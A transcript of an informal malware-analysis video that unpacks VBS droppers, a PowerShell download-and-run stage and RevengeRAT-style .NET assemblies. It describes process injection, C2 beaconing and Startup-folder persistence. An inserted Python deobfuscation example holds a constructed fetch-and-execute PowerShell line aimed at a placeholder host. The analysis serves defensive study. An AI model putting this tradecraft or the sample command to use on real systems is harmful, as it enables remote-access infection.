Hey, what's up? We're gonna be doing some more malware analysis stuff in this video. So here we go. I'm on my Linux virtual machine here, and I got a couple files for us to look at. I got three Visual Basic Script files; you can tell by the extension here, .vbs files. This is gonna be raw, in that I have literally never opened these files whatsoever before in my life. So I'm just gonna screen record, you know, me doing it, and we'll see where we go. I guess this might be pretty heavily edited, but I have literally no idea. I have not opened these whatsoever. So what should we start with, ladies and gentlemen? We'll go for the short boy. Let's go for impule. You know what? Let's make directories for these. Let's go for impule, whatever that means, and let's move the VBS file into that. Um, so let's take a look at what he is. Oh, I like this one. This is, this is fun. Let's call this... yeah, we should start to clean this, so let's go like 01, 00 cleaned, I guess. Looks like it's creating a WScript.Shell. Is there a Visual Basic Script plugin for Sublime Text to get some color in this? Install Package, Package Control, where are you? Oh, he's loading repositories. Okay, whatever. We know anyway that that VVVVVVVVVVVVNNNNNNNN is WScript.Shell, so let's call that WScript shell, and that seems to be just about everywhere else. StrReverse is gonna be a good PowerShell boy. You can tell that because it's including PowerShell here, concatenating it all together. What is going on? Why is Sublime Text taking forever to load these repositories? Oh, no. Speak of the devil. Visual Basic Script, VBScript, installing that package. Let's see how we do. Why is it taking so long? Oh my goodness. Let's just call this variable, you know, little PowerShell, because we know that's what it's going to be. PowerShell. And we could probably literally just, like, remove this. We can just call that this, the string that we know it's going to be: PowerShell with the space in it.
If you can't tell, that's because this spells PowerShell backwards, all concatenated. And, you know, we reverse it. So there's that PowerShell. They don't have a capital S, not that it literally matters whatsoever. No, it's a lowercase s. With the space. Okay. So, set syntax: Visual Basic Script. There we go. Now we get some colors in here. We're going to do a Run command with our PowerShell string, adding in -NoExit, comma, -Command. I'm sure that's -Command Invoke-Expression New-Object. What the f? That's a lot of plus signs. Literally every single empty string is just being concatenated together here. Alright, we gotta nerf that. So let's replace all the backticks that are being used as escape sequences. We'll replace each character that tries to escape, just following it with itself. So that's a little bit more readable and legible. Hey, hey, hey, hey, John from the future here real quick. Some of you people, you know, the ones, you know those people, might be saying, "John, why did you bother including the character after the backtick? If you could literally just replace the backtick with nothing, you wouldn't have to worry about the next character." To that, I say you're right. I am a goddamn idiot. Sorry. All right, back to the video, everybody. And we should also go ahead and remove these single quotes concatenated with single quotes, because they're doing nothing. Here we go. Um, did I do something wrong there? Single quote with a plus sign with a plus sign, interpreted literally. Regular expressions, please. Ctrl+Enter it there. There we go. What do we got? PowerShell Invoke-Expression New-Object Net.WebClient DownloadString. Passing in his strings. That's kind of neat. Invoking. Wait, how does this do this? Invoke-Expression... .invoke... .jpeg. So we're downloading a JPEG, right? Oh, and then we're going to exit, but we're going to hide that window and not show it and wait for that command to exit. And then we're going to remove our WScript.Shell object.
And we're going to sleep for an hour. Yeah. No, no, no, no. 1000 is one second. So a minute. Yes, that's math. Math is hard. Empty string. We'll call that variable empty string. And then a Shell follows just after it as a string. So CreateObject. Okay, it's just gonna literally call that Shell.Application NameSpace(7). We know from previous videos NameSpace 7 is your current user's, like, Startup directory, to auto-run and auto-start once you would log in. So it's going to copy this script, WScript.FullName, to 1048. What? No, you idiot. That math does not add up. Copies. Oh, it literally tells us. Thank you. Nice comment explaining what's happening there. Let's do the fun stuff, and let's go figure out what's going on with this PowerShell syntax pulling from this domain. Please, please, please still be live. I would love to see it. You love to see it. curl -k, because it's going to use HTTPS and we should probably just go ahead and nerf that. What you got for me? Yes. Oh, my goodness, there's stuff. Can I tee that out to 02_powershell.ps1? Yeah, all righty. So let's check out our 02 PowerShell .ps1. What we got here, boys and girls? Completely random string name to a lot of nonsense. Although, however, that is seemingly just a binary. I'm pretty sure it's using that in place of zeros, to denote a zero character. You can see by that Replace method up there. So let's clean that up. I'm going to just use Python to do that. Yeah. Yeah, I'll use Python to do that. Go. All right. Now let's double-click literally all of that. Sorry. That was very bright, very fast, very quickly. And let's slap that in. There we go. There we go. And we will call that variable hex code, because we can tell that it is hex. Now we got another function over here. EAQFJIL. And you do some weird stuff. Oh, you are interpreting hex. Yeah, you're just converting hex to bytes. The way you can tell, right, is it takes a parameter, which we will call argument one.
How about that? And this thing will be an argument list. Excuse me, this, this new variable CCCVVV56000 will be a byte list, a list of bytes. That's going to be the length of the argument passed in divided by two. So it's cut in half, right? That makes sense because a byte represented in hex will just be two kind of digits or two characters, A through F, 0 through 9. So we'll call that unhexlified, using some Python language there. So then we just loop through the entire argument that we passed in, incrementing by two, taking that index and then converting it with base 16, right? So we are unhexlifying that. So let's call that function unhexlify. Okay. Now we have even more. What the heck? TTTs0788888. And though, however, that's going to be obfuscated once again with that Replace technique. So let's steal all that. I'll use Python to do that because it's literally the exact same syntax. Again, just pasting that in, double-clicking and all this, brace your eyes for some white text. There we go. And let's replace that line with that. Oh, crap, you know, I should have saved this as, like, a 02 cleaned PowerShell thing, because I want to keep the original for posterity's sake. So let's call that other hex, I guess. And then we unhexlify that, um, decoded other hex. And then we decode the original hex code that we saw at the very, very top of this script. So we'll call that one just decoded hex. Oh, hello. Hello, computer. Are you there? Okay, decoded hex. Ta-da. And then we'll use reflection. We'll use some neat little magic in the Windows world to load in this entire thing. So we know that this will be a .NET assembly, right? So we can open this thing up in ILSpy or dnSpy. And then we do a GetType based off these class names. Oh gosh. And GetMethod, Invoke, null objects. See when... Whoa, where are we going? What are we doing? Red services with our decoded hex. There's stuff happening.
Okay, we should totally go ahead and determine what these things are. Because decoded other hex looks like it's going to be the, the reflection-loaded program. And we can unhexlify that and create a file from it and then see what this thing ends up running and doing with these function calls here, doing something with red services .exe, and also the decoded hex up here. So let's do it. I'll close out of Python, because if we were to simply echo all that out on our terminal, we can use xxd -r -p to reverse and print out all of that hex. We'll call that other hex dot... is this going to be an .exe or a .dll? Probably a DLL, take a guess, right? Let's check out that other hex. It's a DLL. We were right on the money, guys. It is a Mono/.NET assembly, which means that we can open it up in ILSpy or dnSpy. I'll use ILSpy because the internet gets angry when I do, and for some reason I find enjoyment in that. I'm just kidding. There's literally no reason why I use that over the other, aside from the fact that... weird. What do I call this? More Visual Basic, or impule, other_hex.dll. There we go. Let's make this text a little bit bigger so you guys can see it. Kablammy. Let's go 18, because 20 is just too much. Okay, what do we got here? ClassLibrary2. Nice. That's a good default Visual Studio Code or Visual Studio name for the project. And we've got some little classes here to work with. We got a good CGMT for a geo, etc. And we also have some resources loaded in. No, we don't. Never mind. Module stuff. Nothing really usually in there. Let's look at the code, ladies and gentlemen. Talk is cheap. Show me the code, as they say. Ah, there's nothing happening in that function. It has already expanded and there's literally nothing happening. Thankfully, however, that is not the one that this thing calls. We can see, as the E30RKK, etc. So let's check out that function. Oh, gosh, took a little bit of time to decompile.
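The clean-up steps walked through above (reversing the concatenated "powershell " string, stripping the junk backtick escapes and `'+'` concatenation from the PowerShell stage, then undoing the Replace-then-hex trick and checking for an MZ header), as an added Python example that is not from the video or its author. Every sample input is constructed, and the `ZERO_TOKEN` stand-in is an assumption rather than the token the real sample's `.Replace()` used.

```python
"""Added example: Python helpers for the manual clean-up steps shown in the
video.  All sample inputs are constructed for illustration; ZERO_TOKEN is an
assumed stand-in, not the token used by the real sample."""
import binascii
import re

# --- Stage 1: the VBS builds its PowerShell string backwards -----------------
# Constructed fragments: concatenated they read " llehsrewop", which the
# script hands to StrReverse to get "powershell " (note the trailing space).
SAMPLE_REVERSED_PARTS = [" ", "lle", "hsr", "ewop"]


def recover_reversed_string(parts):
    """Join the VBS string fragments, then apply StrReverse."""
    return "".join(parts)[::-1]


# --- Stage 2: the PowerShell one-liner hides behind junk escapes -------------
# Constructed command: backticks escape harmless letters and the literal
# '+' splits one string into pieces that concatenate back together.
SAMPLE_OBFUSCATED_PS = (
    "Inv`oke-Ex`pression (Ne'+'w-Ob'+'ject Net.We'+'bClient)"
    ".Down'+'loadStr'+'ing('http://example.invalid/stage.jpeg')"
)


def strip_backtick_escapes(text):
    """Drop each backtick and keep the character after it.

    Only safe when the backticks escape ordinary letters, as here.  A real
    PowerShell escape such as `n or `t stands for a newline or tab, so the
    function refuses to touch input that contains one.
    """
    if re.search(r"`[0abefnrtuv]", text):
        raise ValueError("real PowerShell escape present; translate it first")
    return re.sub(r"`(.)", r"\1", text)


def drop_junk_concat(text):
    """Remove the '+' sequences that split one literal into many."""
    return text.replace("'+'", "")


def clean_powershell(text):
    """Both clean-ups, in the order the video applied them."""
    return drop_junk_concat(strip_backtick_escapes(text))


# --- Stage 3: hex blob with its zeros swapped for a token ---------------------
ZERO_TOKEN = "Z"  # assumed stand-in; the real sample's .Replace() token differs
# Constructed blob: the first 16 bytes of a standard DOS/PE header
# (4D5A9000 03000000 04000000 FFFF0000) with every "0" replaced by the token.
SAMPLE_HEX_BLOB = "4D5A9ZZZZ3ZZZZZZZ4ZZZZZZFFFFZZZZ"


def undo_replace_and_unhexlify(blob, token=ZERO_TOKEN):
    """Reverse the .Replace(token, '0') step, then convert hex to bytes."""
    hexstr = re.sub(r"\s+", "", blob.replace(token, "0"))
    if len(hexstr) % 2:
        raise ValueError("odd-length hex after un-replacing; wrong token?")
    return binascii.unhexlify(hexstr)


def looks_like_pe(data):
    """Cheap sanity check before handing the bytes to a .NET decompiler."""
    return data[:2] == b"MZ"


if __name__ == "__main__":
    print(recover_reversed_string(SAMPLE_REVERSED_PARTS))
    print(clean_powershell(SAMPLE_OBFUSCATED_PS))
    pe_bytes = undo_replace_and_unhexlify(SAMPLE_HEX_BLOB)
    print(pe_bytes.hex(), looks_like_pe(pe_bytes))
```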
We got other read-only, random-name variables for integer pointers here. Other peculiar ones. He's just laying out structs, though. Oh, those must be, like, the, like the types for some Win32 API stuff, callbacks. We are loading in CreateProcess, right? So we could probably rename that. We are loading in GetThreadContext, so we could probably rename that. Wow64GetThreadContext, SetThreadContext, etc., etc., etc., etc., etc. VirtualAllocEx, remote, ResumeThread. Oh, goodness. Okay, so this will do something shady. We can know that for sure. What's going on in that function? We defined that already? No, we're, like, at the very top of this. So if this thing, num equals two, otherwise num equals false. Excuse me, num equals four. I was reading that if false, that's never going to happen, guys. That's not, not going to do anything. And then goto IL this thing, which is literally the next line. Okay, cool. Result, flag, num two, etc. While true. So all the time we're going to check that num. I'm assuming this is going to end up checking, like, architecture. Can I go see what this does? Discarded unreachable code. That's not helpful for me. Okay. La la la. Let's scroll back up. Gosh, there's a lot in this. WTF. What the heck is happening? Oh my goodness. Okay. Okay. Okay. I got my sanity back momentarily. Case five, which we know is not going to happen because it can either be two or four. So far, flag two is going to equal that function. If flag two, oh, it's going to equal not that function seemingly, and num six, continue. And if that's set... checked? What the heck is checked? Is that a function? Where's that coming from? Num equals seven. Result equals true. I'm just reading, reading things right now. None of this makes sense to me. There's that other function that is called, discard unreachable code. So there are segments that are just kind of wonky. This other one is up here. This other one is up here. We define a struct. Is that an inline function for checked? Has it happened?
Stuff. That's a lot going on. Otherwise, case four. Oh, this is another while loop sort of thing. Wait, wait, wait, wait, wait. One of those is the only function that's called, QYPIM, and that's the very, very top one that we saw. I mean, it's, I guess it's this class. Oh, no, no, no, but it invokes one specific one, doesn't it? Yeah. ZLNHAQYYQ. Of course. So let's Ctrl+F for that guy. That's the function that we're looking at right there. Okay. We run that thing again. Run that thing again. Oh, it's literally, oh, God dang, it's literally the thing we were just looking at. What am I doing? What am I doing? Randomness equals converting that thing, converting that thing to a type handle. Bool flag, vodka, 44MLM. Man, you guys really aren't doing me any favors naming your variables complete nonsense, I gotta say. num8, int 3260. What the heck? You take an argument somewhere. We know. We know you take an argument somewhere. I mean, I guess it's going to be an argument to this string. Yeah. It doesn't have a name. What, what, how do you, how do you refer to the variable? How do you refer to that parameter? Do you? We're calling registrars.exe somewhere. Buffer.BlockCopy. Oh, is this going to be some shellcode at some point? Is there going to be shellcode in this? BlockCopy, if that thing with the thing, and then do it. Me trying to read code that doesn't make any sense because it has no proper naming, and it's just a bunch of switch-case statements. I could, like, sure, we could explore through this a little bit more, but truthfully, I don't think we need to. I'll be honest. GetProcessById. Does this thing return a process ID? That thing does a thing? Nope. Nope. That doesn't do a lot. That doesn't do a lot. Oh, a lot of these are teeny weeny. A lot of these just, like, are wrappers for other functions. That's dumb. P0 seems to be a process ID, I'm assuming, or a process object.
A process ID makes the most sense to me because this is referenced in other places. We could try to explore this and, like, copy and paste it in Sublime Text to change up some of those variables. You guys know if I can change variable names, like, within dnSpy or ILSpy? I don't know. Not gonna lie. Okay. Okay. I think I've had enough of that one. I think we had our fun. It's doing weird stuff. That's good. Oh, wait a second. We didn't even see what the other one, we didn't even see what the other hex was. You guys, you should have told me. I mean, this is still going to be stringing nonsense. So ILSpy, get rid of that tooltip, please. I don't need to see that. Die. Okay. Thanks. ILSpy is gone. Let's do another echo, pasting in all that hex. Let's do an xxd -r -p, redirect it to argument.dll, I guess. Yeah. argument.dll is another GUI program, Mono/.NET assembly for Microsoft Windows. I didn't actually do, like, any other stuff to check out other strings in this. I doubt there'll be actually anything worthwhile or interesting, because it already all seems to be relatively well obfuscated with the random variable names. Yep. And we can see all those in there. So not extremely useful. What about our argument.dll? Before we, before we crack that thing open: GetType, GetMethod, Invoke, CreateInstance, client.exe. What are you doing? All right. Let's, that one, that one deserves a little bit of love. Let's open it up in ILSpy. If I pass an argument to ILSpy, will it just, like, know to do it? Other things that I don't know. We called this more_visual_basic_script argument.dll. What do we got? Lime. What? Lime.Program. What is that? Client.Run. Okay. So it takes a Client object. Have we looked at this before? Have we looked at this sort of thing before? Where's the Client? Is that going to be defined in, like, the Lime connection? Probably. Yeah, there it is. Clients. Okie dokie. Send buffer size. Connecting to Config.Host.
There's got to be a Config here somewhere. Ping. Keep-alive ping. StringToBytes. Send it to the packet in the TCP SendPacket fixer. Okay. So there is functionality to have command and control. Is that fair to say? You think, am I, am I crazy in that? And, like, look, we reach out to a server? Yep. Literally create a socket connection based off of the host and the port. So what else we got? How can we read that config? Where does that config live? There's a lot of stuff in Lime.Helper. SendInfo. We'll take a GetHardDiskSerialNumber. GetIP. Environment.MachineName. Environment.UserName. Camera. ComputerInfo. Get OS full name. GetSystem. Get the CPU kind. Get total physical memory. GetAV. Nice. More get antivirus. Check in the firewall. Products. Port key, etc. GetActiveWindow. So GetIP. GetHardDiskSerialNumber. GetCamera, sure, for drivers, if it has a camera or not. That's kind of crazy. GetSystem. That looks like it is getting the CPU, Win32_Processor. GetAV. That's going to end up doing some WMI stuff. You can tell by the ManagementObjectSearcher and root\SecurityCenter variables there. DisplayName. Yeah. Yeah. Yeah. Get CPU. Read it out of a registry value. Nice. And active window. Okay. So just, oh, that generates the ID. Wow. Okay. So based off of all those things, that's the ID. Prevent sleep: run execution state is going to end up being that thing. StringConverter. These are all a couple of convenience functions, right? We are in the Helper class, seemingly. Hello. That's all. Decompress. Okay. Compressing a gzip stream and encoding and decoding from base64. Fair enough. Lime.NativeMethods. These seem to be Win32 API calls that we pull in. So GetVolumeInformation and GetForegroundWindow. GetWindowText, maybe. It doesn't actually say what function, the entry point that it calls. capGetDriverDescription and SetThreadExecutionState. Huh. Okie dokie. Check out the Lime packets. PacketHandler. What do we got?
So I'm assuming if this is going to be a packet handler, that would mean that it runs server side, right? Handler. I mean, I guess, I guess, does... is the victim the server in this case? No, I feel like that would be the client, right? But it handles a packet. Right. GPL, LP, UNV. CallByName, array one, default, GetString. What are these? What are those bytes going to spell out? Let's replace all those newlines with a space. Let's grab this and then let's go back to a... Hello. What am I doing over there? Let's run a python3. Let's do a chr(x) for x in that list. GetType. Okay. So all you're doing was just carving together some other syntax. There was not... Okay. Same exact thing. Basically CallByName. Some other obfuscation methods. Encode. Get executable path. Execute. This one, though, looks like it has more to it. Let's do that one more time. So chr(x) for x in all of that. CreateInstance. Okay. Okay. Object CallByName looks like it's adding in some file and extension kind of thing based off of the ID. If Registry.CurrentUser.OpenSubKey... whatever. You know. Where is the config file? Lime.Settings config. Oh, what is... Excuse me. Check out this IP address real quick. Check out that port. RevengeRAT. String key is RevengeRAT. Let's go to Shodan on that real quick. Check out that IP address. Kablammy. Dallas, United States. What's going on? Didn't we look up... Is that right? Let's look for IP locator. Dallas, Texas, for real. Okay. I feel like we've seen a lot of Dallas, Texas for some reason. The ID looks like it is base64. And Mr. Ahmed. Excuse me. Mr. Ahmed's RevengeRAT. Current mutex is that thing. Splitter is nine. Mr. Ahmed RevengeRAT. Is this a known thing? Crypted RevengeRAT. What are you? Thank code. Mr. Ahmed crypto fund. There's a strange email. ILSpy, I'm going to need you to stop throwing in a random tooltip. Whatever you want. Free download, bypass Windows Defender, fully undetected, AsyncRAT, MP3 file. Where's Mr.
Ahmed in this? Thank code. Mr. Ahmed. Yeah, dude. Check it out. Get ExpressVPN online. The VPN that just works. It just works. Ladies and gentlemen. Crypted RevengeRAT. RevengeRAT, RevengeRAT malware. Oh, RevengeRAT is a remote access Trojan discovered by our good friends over at Cisco Talos. RevengeRAT, Malpedia, ANY.RUN. Threatpost has something over... But I want to know about Mr. Ahmed. Is he, is this his, like, claim to fame? RevengeRAT is a remote access Trojan discovered by this thing. BleepingComputer provides a technical analysis. Oh, heck yeah. I'm loving the BleepingComputer guys. That's all that New Jersey cybersecurity is going to be willing to tell me. RevengeRAT. 193. Wait. That's not the same IP address, is it? That's not the same IP address that we have. It's kind of close. Yeah. Okay. He's in sacred... Hey, that looks kind of similar to what we had. I mean, it's just a running PowerShell. Okay. What do you got for me, ZDNet? Fortinet sees it. Visual Basic Script, it's able to call a Shell.Application object that generates a new Visual Basic Script file. Oh, we do have a couple others that we should tinker with. One of these are going to end up being in batch mode. It will receive commands from a command and control IP address: volume data, machine names, usernames, whether or not a webcam has been detected. Yeah. Then it gets into WSH RAT, which is seemingly different from RevengeRAT. The Gorgon Group. Is Mr. Ahmed in there? Is Mr. Ahmed in our good Gorgon Group? Unit 42 researchers have been tracking, etc. Technical analysis of some of the attacks, as well as attribution links with Pakistani actors, have been already depicted by 360 and two sec, which I find interesting. Connection to larger groups of attackers: Unit 42, which has been tracking what we are calling the Gorgon Group. Is that the thing from Legend of Zelda? The Gorgons. Oh, no. Gordon. What is it called in Legend of Zelda? Legend of Zelda. No, it is a Goron. No second G. Cool.
The Gorgons. Oh, Remcos malware. Had some fun with that before. Let's see what we got. RevengeRAT. Shell.Application, CMD. Is there anything different in this? Oh, they found the same .vbs file that the other one did. Downloader downloads something here. Microsoft script file. Yeah. Okay. Okay. Okay. Okay. Okay. Registry keys and Microsoft executing RevengeRAT and persistence. There they go ahead and run it, kind of as we saw. Connecting to the C2 server. Nuclear explosion. So that's, like, I asked what it is normally called. The IP addresses. Wait, wait, wait, wait, wait. Is that IP address the same as ours? That looks, that looks more promising. Oh, it's so stinking close. Or was that the same one as last time? I get excited for no reason. Oh, port numbers are 5478, and that's not our port number either. I'm just dumb. That's all. ILSpy, stop with the tooltip, man. "Just as we started analyzing the malware, unfortunately the two command and control servers had been shut down." Tell me about it, bro. Like, story of my life over here. Not that I'm actually doing anything remotely worthwhile. Okay. So if this is RevengeRAT, all of this tradecraft from what folks have seen previously... Oh, last seen, like, today though, according to ANY.RUN. RevengeRAT is a freely available remote access tool written in .NET and C#. Is there, like, a link to the source code or something, if it's freely available? Silence. Oh, come on. No, this, this just takes me to their website. That's not all that helpful. Breaking it down. They're using a WScript.Shell object, but then they're creating a scheduled task. Yeah. Oh, they do a little reflection, kind of the same way we did. Analyzing this function, we found several command magic strings, the researcher wrote, the most notable of which are the P command, which asks the malware to collect the victim's topmost window title,
the IE and LP commands that ask the malware to manipulate the system registry, and the UNV command packet, meanwhile, allows the attacker to send malicious assembly language, or ASM code, of the malware to be executed in memory. We did see that. We did see that in that packet handler, right? Yeah, PIE, PNC, GPL, UNV, and that's going to end up running assembly. Yeah, like shellcode or anything. Neat. Obviously horrific and evil, but still neat. But a fucking nice spot. Stop. As part of the second-stage infection chain, version 1.6 of WSH RAT is also executed. Huh. Well, I guess we could take a look at the others now that we kind of know what this thing is. But RevengeRAT telling us the config. Mr. Ahmed. Where are you, Mr. Ahmed? That doesn't help me. If I just Google Mr. Ahmed... I don't know why I did that. That was just, like, out of, out of a broken habit. Mr. Ahmed Cryptor. Oh, what is this? What the F? Get out of here. ILSpy, I don't like where I am right now. Silent DOC exploit, bypass Google Chrome 2020, silent 100%. Mr. Ahmed. That's got to be him. He has a YouTube channel. Oh my gosh. Oh my gosh. We have to go check him out. What are you doing, Mr. Ahmed? Another one bites the dust. This account has been terminated due to multiple or severe violations of YouTube's policy against spam, deceptive practices, misleading content, or other terms of service violations. He's gone. YouTube took him down. It's cancel culture, everybody. Look at that. Fully undetected. Zero out of 40. No workplaces to show. No schools to show. Other accounts of the similar name. I don't know if Facebook is the right marketplace to showcase. Oh, and all these videos are down, aren't they? Oh my gosh. I didn't realize those were all YouTube videos when I was looking at them, but, like, they're literally all taken down. These are as recent as January. Is there anything that isn't a YouTube video? Who keeps liking these? All of these are YouTube videos. Not the right way, my guy.
Not the right... Oh, this one is... Is it a still thing? World of Hacker. These are still live. Now, granted, I don't exactly know what I'm looking at. I'll be honest. None of these look like they should be on the internet. What do we got here? Get out of here. YouTube. No, no, no. What are you trying to do here? Oh, is this the VMware break? Yeah. So, Mr. Ahmed's YouTube account. Is this a video on installing VMware? What a hack. There's more VMware. What are you doing? Oh, Kali Linux. Installing Kali Linux. Oh, no. Get me out of here. I want to go home. I want to go home. Tor, what is the dark web? Avengers Endgame. Hey, sub to World of Hacker. All right, I'm done. I can't look at this anymore. We found Mr. Ahmed, I think, doing our detective work. All right, let's take a breather and let's get back to it in a moment. All right, that was fun. Kind of went down a little bit more of a PowerShell and C# road than I kind of wanted to, but let's take a look at some of these other guys here. Let's take a look at Impul S. Let's see if they are in any way somewhat related to... oh my gosh, can I type, please? Oh my gosh. Let's see if they're related to our RevengeRAT here. Let's... how many Sublime Text windows do we have open right now? Too many. Here we go. What is this? Oh, these are so good. What are you? What? Look at this randomness. These are just straight-up bytes, just straight-up non-printable bytes in the Visual Basic Script. There's a lot of these. Check out my horizontal scroll bar down there. That's dope. That's got to be a whole other binary. That's got to be, we're, like, just more layers of obfuscated code. What do we got, ladies and gentlemen? What are we doing here? All right, we'll call that everyone's favorite big blob of nonsense. Good, good. Empty string. Oh, wait, no. Empty string. It gets added onto. Yeah, for i to the length of big blob of nonsense. So for every single one of those, it will... what happened? What happened to my empty string?
Oh, oh, oh, oh, there are, there are two empty strings. What? What? Second? No, we, we, we hold that, we keep that in something and we execute it. So maybe it's just got to be more code. More code. Ta-da. We append it together after we just kind of loop through all of it. What is the Asc function in Visual Basic Script? Visual Basic Script Asc function. Thanks, Google. Oh, it converts it to ASCII. Okay, it's definitely just adding more and more to it. But is it concatenating this? I'm confused. It does something in Mid. Takes the middle. Mid function. Oh, it's an index. The Mid function returns a specified number of characters from a string. Okay. Okay. So this weird thing just happens then. Yeah. Can Visual Basic Script just do, like, a write out, write to console? Visual Basic Script. It's probably, like, a WScript.Echo or something. WScript.Echo, or just Echo, Echo. cscript will run it from the console. Oh, so it needs WScript. Yeah. WScript.Shell. Where are you getting WScript? Or is it just, like, in the current context or something? Let's, let's mess with it. Let's grab all of this. Oh, no, the printable characters are going to get wonky. So I need to pull this out to my host some way. All right. Let's impulus... Oh, shoot, I never made a copy of it. I'm a dumbo. Whatever. I don't really... HTTP server. Go. Okay, so now let's get to my host. Let's open up the web browser. Oh, shoot. What is that IP address? 10.0.0.17. No, go to my host, please. 10.0.0.17:8000. Now we got this Visual Basic Script. Dope. Let's edit that with Sublime Text. And oh, gosh. Thank you. Now let's not execute it. And let's do a WScript.Echo. Oh, shoot. I didn't, like, save the name of it. It's going to be this thing, right? That's our more code variable. Yeah. Let's hope so. So we aren't executing anymore. Now let's get a command prompt open. Let's go to my desktop. And let's try and run cscript. cscript. There we go. cscript on... Hello. Where did you go?
Or no, you're in my Downloads, aren't you? Gosh, dang it. Let's put it on my desktop. Okay. cls. Let's do a little cscript on our impulus Visual Basic Script. There we go. Get something new. Get some more Visual Basic Script in there. This. Okay, so let's copy all that and let's bring that back into the virtual machine here. So this is, like, what? Second stage. And this is pretty readable, I say that now. Empty string, Shell. Looks like they're doing the exact same technique to just run Shell.Application as a string copied in. Yep. Okay. So that's the exact same technique. Split equals Najaf. Ready? Those are weird comments. EXE, NIM, execute, a equals FIH. What is FIH? CreateObject. ExpandEnvironmentStrings, %TEMP%. He answers here referring to daytime now. Those comments are nothing. He does not mention anything about looking for a unique num. He does not mention anything about looking for a unique num. What do those mean? What do you mean? Download. That's another function that is seemingly created. Create a Shell object, Run cmd, Chr(34) and s file. What is character 34 going to do? Checking out Python again. Let's do a chr(34). Oh, it's just adding strings to it. Okay. Then we go to get information. Yeah, using XMLHTTP, so we can make some POST requests. Grab our computer name, grab our username. So we have a user. Let's move this out. The user agent, we capture the hardware device seemingly. Where is HWD coming from? Oh, gosh. Oh, that's another function call. Okay. And security is very likely another function call. Oh, gosh. Yeah, just right beneath it. Using WMI to... Where's that End Function? This is the most direct answer to the simple question asked, and is the proven direct... What the heck? Proven direct substitute to Java's System.current... That makes no sense. These all seem like RevengeRAT stuff, at least from everything that we just read. That's it. So this is just another, just another command and control. Another C2. I mean, okay.
Adds its persistence, tells it that it is ready for information, gets data out. And if it is zero, then it will execute. Or no, no, no, no, no. A zero has got to be, like, the index of the split on that. And that will write a file. Oh, all in Temp. Okay. If it is NIM, then it will add persistence. Yeah. Wend. Oh, that must be a while loop end. So all of this should be its own loop. Okay. Run can run stuff. There's nothing in this loop to actually execute anything, was there? No, which is weird. Hardware devices, all throughout here. Download. Again, using GET, saving it. No. What the heck? S location? Oh, that's just where it's going to end up saving. Yeah. And then run C. What is C set to? I can't search for C all that easily, unless I do, like, a "C =". Oh, CreateObject adds it to Startup. Download one C. Okay. Oh, and that is something from NIM. Okay. So it does have the capability to run those through downloading stuff. So it's all just command and control through stuff that it downloads, I guess. Getting all that information. Interesting. I don't think there's anything else. There aren't any other layers to pull through here. But this must be WSH RAT, right? From our Googling RevengeRAT. Because WSH RAT. What you got for me? No, no, no, no. Oh, wow. You can just straight-up download it. Excuse me. Buy now, order now. Oh, YouTube videos. This is intense, man. It's a whole GUI to it. Okay. That's fine. Who posted this? Who shared this video? Is it Mr. Ahmed? No, it's WSH RAT. "I need to buy this, but some people said it does not work good in newer Windows 10 operating systems. Does latest version works good and excellent on Windows 10?" "Yes." "Bro, can you upload a PDF exploit to Android?" What does that mean? Dope. You have another product, apparently, don't you? Look at this. Live view keylogger. Other features. Guys, you can go to this website. WSH software .site is a public thing. RDP viewer. Process explorer. Paste code here to run remote scripts. Nice.
Hidden browser. Reverse proxy. Remote VNC. Buy me with Bitcoin. Hey, what about Dogecoin over here in New York? Oh gosh. Okay. That was fun. What do you got? Houdini. Wasn't a lot of, wasn't a lot of whole technical information in that. So let's go back. Let's keep you going around. Although that was a different IP address, right? This is 19437172. Let's check that out in Shodan. That's again, slightly different, but Dallas, Texas guys. Dallas. I don't know if you know this, but something, I don't know. Like, I don't want to say, Hey, you got hackers in Dallas. That should be a movie. But maybe something is compromised over there. I don't know. Because a lot of these kind of seem to be not doing their thing. Also, this file is still a FTP open. And of course, a classic RDP open to the internet. Right on, guys. Throw security out the window. Who needs it? Can we like reach that page? If I, if I curl this, is that going to like get all wonk? It's dead. Supposedly, supposedly it's dead. Okay. Okie dokie. Let's keep going around on WSH RAT worry any rat Security Affairs for the net again. Threatpost. These are the same. I think these are pretty close to the same things that we saw earlier. What's up with my cursor, guys? Come on now. I don't need help finding my cursor. Although I appreciate it. Yeah, check it through. Look at our website. Buy bit. Buy us with Bitcoin. Shall I go to the equation now? I want to see the code. Oh, this doesn't look like what we were looking at. I'll be honest. WSH at core. Yeah, that's not what we've been looking at. Oh, it does post though. Some pay spin. Nope. Nope. Nope. Nope. Nope. Maybe this isn't WSH RAT because if it has all that functionality, and like we just didn't know. Let's go back to this though. These don't look like they're the same. Everything that we've kind of seen WScript wise doesn't seem to do that. I think. Is that IP address the same as ours? We know one nine three. No, one nine four. Yeah. 
I keep messing that up. Let's go into that again. Threatpost had a portion on WSH RAT. No, these, these just don't seem to be the same WSH RAT. Check it out. Some spam emails. Okay, I'm done with that. Yep. Dunzo. Let's go check out that last one. All right, let's check out our e file transmitter. Let's make a directory for e file transmitter and then move that e file transmitter VBS into that directory. Now we can hop over there and take a look. This one's fun. It just seems to decode some Base64. Oh wow. This is its own like, this is an implementation of Base64 in Visual Basic. That's neat. I'm swiping that. I'm gonna add that to my toolkit. I don't know about you. Cool. And then just straight up execute it. So that's kind of cheesy. Let's call this variable Base64 code. Yeah. And let's call this variable decoded Base64. Bunch of V's and then we execute it. So all we have to do is straight up decode this. Let's put that in base 64 tech. We'll decode that to zero to like stage second stage or whatever second stage dot VBS. What do you got? It's the exact same code. It's literally identical. This is this is the exact same thing as what we just saw different different IP address different port. Are you still over in Dallas? Don't don't be over in Dallas buddy. I'm really bummed. No, is that the same? That's the same. It's just a different port. Oh shoot. I wonder if I wonder if that IP address is on. See if that rat is still active. Lamos. One day we'll get a live one guys. One day. This is the exact same code though. Download function hwd function. Yeah. Yeah. It's still the exact same thing. Well, I don't think there's a whole lot else to this. It's just it's interesting that that one used visual basic script while the other just used some strange X or things. So there's got to be some tidbit to it. But that's all I think that's all I kind of wanted to go through. So I'm fading out not going to lie. 
That was a bad video because it was just kind of chilling just kind of me goofing off is kind of me doing whatever. I don't know if that's actually helpful or useful for people. So please let me know in the comments. You know, weird kind of video, but I figured it. Hey, you know what? We try it just to just record stuff. Thanks so much for watching everybody. If I do actually upload this by
